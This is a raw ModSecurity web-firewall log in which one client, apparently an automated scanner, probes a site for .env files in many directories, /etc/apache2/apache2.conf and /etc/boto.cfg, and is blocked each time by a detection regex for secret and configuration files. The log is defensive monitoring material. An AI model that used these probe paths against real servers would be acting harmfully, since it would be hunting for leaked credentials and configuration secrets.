[Tue May 26 13:04:21.105047 2026] [security2:error] [pid 485064:tid 485220] [client 195.178.110.199:45684] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/development/.env"] [unique_id "ahVM_T9tlF55stOmSqH6bAAAAJ8"]
[Tue May 26 13:04:21.109383 2026] [security2:error] [pid 485064:tid 485261] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6agAAAMg"]
[Tue May 26 13:04:21.167380 2026] [security2:error] [pid 485064:tid 485321] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6bwAAAQQ"]
[Tue May 26 13:04:21.191293 2026] [security2:error] [pid 485064:tid 485200] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6cgAAAIs"]
[Tue May 26 13:04:21.215218 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6dwAAAIc"]
[Tue May 26 13:04:21.243594 2026] [security2:error] [pid 485064:tid 485195] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6fAAAAIY"]
[Tue May 26 13:04:21.257983 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6gAAAAJA"]
[Tue May 26 13:04:21.311291 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/dev/.env"] [unique_id "ahVM_T9tlF55stOmSqH6gwAAAME"]
[Tue May 26 13:04:21.327313 2026] [security2:error] [pid 485064:tid 485275] [client 195.178.110.199:45750] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/develop/.env"] [unique_id "ahVM_T9tlF55stOmSqH6iQAAANY"]
[Tue May 26 13:04:21.351524 2026] [security2:error] [pid 485064:tid 485271] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6hwAAANI"]
[Tue May 26 13:04:21.355177 2026] [security2:error] [pid 485064:tid 485250] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6iAAAAL0"]
[Tue May 26 13:04:21.356521 2026] [security2:error] [pid 485064:tid 485242] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6hgAAALU"]
[Tue May 26 13:04:21.418060 2026] [security2:error] [pid 485064:tid 485233] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6jgAAAKw"]
[Tue May 26 13:04:21.499414 2026] [security2:error] [pid 485064:tid 485264] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6lwAAAMs"]
[Tue May 26 13:04:21.508350 2026] [security2:error] [pid 485064:tid 485277] [client 195.178.110.199:45574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6mgAAANg"]
[Tue May 26 13:04:21.511366 2026] [security2:error] [pid 485064:tid 485253] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6mwAAAMA"]
[Tue May 26 13:04:21.538527 2026] [security2:error] [pid 485064:tid 485305] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6oAAAAPQ"]
[Tue May 26 13:04:21.539693 2026] [security2:error] [pid 485064:tid 485249] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6owAAALw"]
[Tue May 26 13:04:21.691774 2026] [security2:error] [pid 485064:tid 485234] [client 195.178.110.199:45684] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVM_T9tlF55stOmSqH6uAAAAK0"]
[Tue May 26 13:04:21.694648 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6sgAAAJI"]
[Tue May 26 13:04:21.697113 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6tgAAAOo"]
[Tue May 26 13:04:21.697970 2026] [security2:error] [pid 485064:tid 485309] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6rQAAAPg"]
[Tue May 26 13:04:21.746962 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6vwAAAIc"]
[Tue May 26 13:04:21.757482 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:45754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/fe/.env"] [unique_id "ahVM_T9tlF55stOmSqH6wwAAAJA"]
[Tue May 26 13:04:21.774968 2026] [security2:error] [pid 485064:tid 485285] [client 195.178.110.199:45750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6wgAAAOA"]
[Tue May 26 13:04:21.872341 2026] [security2:error] [pid 485064:tid 485292] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/front/.env"] [unique_id "ahVM_T9tlF55stOmSqH60wAAAOc"]
[Tue May 26 13:04:21.874181 2026] [security2:error] [pid 485064:tid 485243] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6zwAAALY"]
[Tue May 26 13:04:21.909208 2026] [security2:error] [pid 485064:tid 485289] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH60gAAAOQ"]
[Tue May 26 13:04:22.007466 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/etc/boto.cfg"] [unique_id "ahVM_j9tlF55stOmSqH63QAAAMY"]
[Tue May 26 13:04:22.019407 2026] [security2:error] [pid 485064:tid 485260] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH62wAAAMc"]
[Tue May 26 13:04:22.100750 2026] [security2:error] [pid 485064:tid 485305] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH66AAAAPQ"]
[Tue May 26 13:04:22.104141 2026] [security2:error] [pid 485064:tid 485241] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH65wAAALQ"]
[Tue May 26 13:04:22.107225 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH66QAAAKE"]
[Tue May 26 13:04:22.149841 2026] [security2:error] [pid 485064:tid 485279] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH67AAAANo"]
[Tue May 26 13:04:22.163779 2026] [security2:error] [pid 485064:tid 485234] [client 195.178.110.199:45754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/info.php"] [unique_id "ahVM_j9tlF55stOmSqH69AAAAK0"]
[Tue May 26 13:04:22.174540 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/erp/.env"] [unique_id "ahVM_j9tlF55stOmSqH69QAAAJI"]
[Tue May 26 13:04:22.182826 2026] [security2:error] [pid 485064:tid 485300] [client 195.178.110.199:45574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/infos.php"] [unique_id "ahVM_j9tlF55stOmSqH6-QAAAO8"]
[Tue May 26 13:04:22.189142 2026] [security2:error] [pid 485064:tid 485223] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH68AAAAKI"]
[Tue May 26 13:04:22.208061 2026] [security2:error] [pid 485064:tid 485313] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH6-AAAAPw"]
[Tue May 26 13:04:22.244660 2026] [security2:error] [pid 485064:tid 485274] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6ywAAANU"]
[Tue May 26 13:04:22.313717 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/lms/.env"] [unique_id "ahVM_j9tlF55stOmSqH7AAAAAQI"]
[Tue May 26 13:04:22.318941 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH6_wAAAIw"]
[Tue May 26 13:04:22.334591 2026] [security2:error] [pid 485064:tid 485232] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/local/.env"] [unique_id "ahVM_j9tlF55stOmSqH7AQAAAKs"]
[Tue May 26 13:04:22.387341 2026] [security2:error] [pid 485064:tid 485209] [client 195.178.110.199:45670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/frontend/.env"] [unique_id "ahVM_j9tlF55stOmSqH7EQAAAJQ"]
[Tue May 26 13:04:22.389786 2026] [security2:error] [pid 485064:tid 485293] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7DQAAAOg"]
[Tue May 26 13:04:22.390151 2026] [security2:error] [pid 485064:tid 485285] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7CwAAAOA"]
[Tue May 26 13:04:22.393700 2026] [security2:error] [pid 485064:tid 485199] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7DAAAAIo"]
[Tue May 26 13:04:22.409646 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:45620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/infophp.php"] [unique_id "ahVM_j9tlF55stOmSqH7FQAAAM8"]
[Tue May 26 13:04:22.479381 2026] [security2:error] [pid 485064:tid 485211] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/market/.env"] [unique_id "ahVM_j9tlF55stOmSqH7HwAAAJY"]
[Tue May 26 13:04:22.495381 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7GAAAALk"]
[Tue May 26 13:04:22.510948 2026] [security2:error] [pid 485064:tid 485273] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7HgAAANQ"]
[Tue May 26 13:04:22.517650 2026] [security2:error] [pid 485064:tid 485233] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7IgAAAKw"]
[Tue May 26 13:04:22.520292 2026] [security2:error] [pid 485064:tid 485272] [client 195.178.110.199:45734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/laravel/.env"] [unique_id "ahVM_j9tlF55stOmSqH7KAAAANM"]
[Tue May 26 13:04:22.520655 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7JQAAAMM"]
[Tue May 26 13:04:22.573927 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7LAAAAKE"]
[Tue May 26 13:04:22.655109 2026] [security2:error] [pid 485064:tid 485286] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7NAAAAOE"]
[Tue May 26 13:04:22.672481 2026] [security2:error] [pid 485064:tid 485234] [client 195.178.110.199:45684] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/marketing/.env"] [unique_id "ahVM_j9tlF55stOmSqH7NwAAAK0"]
[Tue May 26 13:04:22.695129 2026] [security2:error] [pid 485064:tid 485309] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node-api/.env"] [unique_id "ahVM_j9tlF55stOmSqH7OQAAAPg"]
[Tue May 26 13:04:22.702727 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7OAAAAJI"]
